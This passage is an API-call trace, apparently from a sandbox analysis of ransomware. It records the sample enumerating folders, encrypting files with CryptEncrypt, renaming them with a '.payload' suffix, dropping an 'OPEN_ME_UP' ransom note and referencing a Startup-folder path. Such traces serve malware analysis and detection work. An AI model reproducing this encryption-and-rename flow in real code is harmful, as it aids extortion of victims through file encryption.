pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\*") returned 32 [0058.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606320 [0058.987] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.987] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.987] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.987] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.987] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.987] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\.") returned 32 [0058.987] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.987] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.987] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.987] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.987] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.987] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.987] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.987] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\..") returned 33 [0058.987] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.987] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.988] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.988] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.988] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.988] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.988] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.988] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.988] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 39 [0058.988] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.988] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.988] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.988] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.988] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.988] GetTickCount () returned 0x114f2ed [0058.988] GetTickCount () returned 0x114f2ed [0058.988] GetTickCount () returned 0x114f2ed [0058.988] GetTickCount () returned 0x114f2ed [0058.989] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.989] GetProcessHeap () returned 0x5e0000 [0058.989] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.989] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xe3b, lpOverlapped=0x0) returned 1 [0058.990] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff1c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.990] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xe3b, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xe3b, lpOverlapped=0x0) returned 1 [0058.990] GetProcessHeap () returned 0x5e0000 [0058.990] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.990] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.990] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.991] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.991] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.991] CloseHandle (hObject=0x438) returned 1 [0058.992] GetProcessHeap () returned 0x5e0000 [0058.992] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.992] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.994] GetProcessHeap () returned 0x5e0000 [0058.994] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.995] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.995] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.995] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.995] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.995] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.995] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.995] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 48 [0058.995] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.995] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.995] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.995] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.995] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.995] GetTickCount () returned 0x114f2fc [0058.995] GetTickCount () returned 0x114f2fc [0058.995] GetTickCount () returned 0x114f2fc [0058.995] GetTickCount () returned 0x114f2fc [0058.995] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.995] GetProcessHeap () returned 0x5e0000 [0058.995] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.995] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.997] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.997] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.997] GetProcessHeap () returned 0x5e0000 [0058.997] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.998] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.998] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.998] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.998] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.998] CloseHandle (hObject=0x438) returned 1 [0059.079] GetProcessHeap () returned 0x5e0000 [0059.079] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.079] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.083] GetProcessHeap () returned 0x5e0000 [0059.083] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.083] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.083] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.083] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.083] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.083] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.083] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.084] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 49 [0059.084] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.084] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.084] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.084] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.084] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.085] GetTickCount () returned 0x114f35a [0059.085] GetTickCount () returned 0x114f35a [0059.085] GetTickCount () returned 0x114f35a [0059.085] GetTickCount () returned 0x114f35a [0059.085] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.085] GetProcessHeap () returned 0x5e0000 [0059.085] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.085] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.087] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.087] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.087] GetProcessHeap () returned 0x5e0000 [0059.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.087] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.087] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.087] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.087] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.087] CloseHandle (hObject=0x438) returned 1 [0059.089] GetProcessHeap () returned 0x5e0000 [0059.089] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.089] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.089] GetProcessHeap () returned 0x5e0000 [0059.089] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.089] FindNextFileW (in: hFindFile=0x606320, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.089] FindClose (in: hFindFile=0x606320 | out: hFindFile=0x606320) returned 1 [0059.089] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.089] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1040\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.090] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.090] CloseHandle (hObject=0x430) returned 1 [0059.091] GetProcessHeap () returned 0x5e0000 [0059.091] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.091] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1041", cAlternateFileName="")) returned 1 [0059.091] lstrcmpiW (lpString1="1041", lpString2="Windows") returned -1 [0059.091] lstrcmpiW (lpString1="1041", lpString2="$Recycle.bin") returned 1 [0059.091] lstrcmpiW (lpString1="1041", lpString2="System Volume Information") returned -1 [0059.091] lstrcmpiW (lpString1="1041", lpString2="Program Files") returned -1 [0059.091] lstrcmpiW (lpString1="1041", lpString2="Program Files (x86)") returned -1 [0059.091] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041") returned 30 [0059.091] lstrcmpW (lpString1="1041", lpString2=".") returned 1 [0059.091] lstrcmpW (lpString1="1041", lpString2="..") returned 1 [0059.091] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.091] GetProcessHeap () returned 0x5e0000 [0059.091] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.091] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\*") returned 32 [0059.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6065e0 [0059.091] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.091] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.091] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.091] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.091] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.091] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\.") returned 32 [0059.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.091] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.092] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.092] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.092] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.092] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.092] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.092] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\..") returned 33 [0059.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.092] FindNextFileW (in: hFindFile=0x6065e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.092] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.092] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.092] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.092] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.092] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.092] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 39 [0059.092] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.092] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.092] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.092] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.092] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.092] GetTickCount () returned 0x114f35a [0059.092] GetTickCount () returned 0x114f35a [0059.092] GetTickCount () returned 0x114f35a [0059.092] GetTickCount () returned 0x114f35a [0059.092] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.092] GetProcessHeap () returned 0x5e0000 [0059.093] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.093] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, 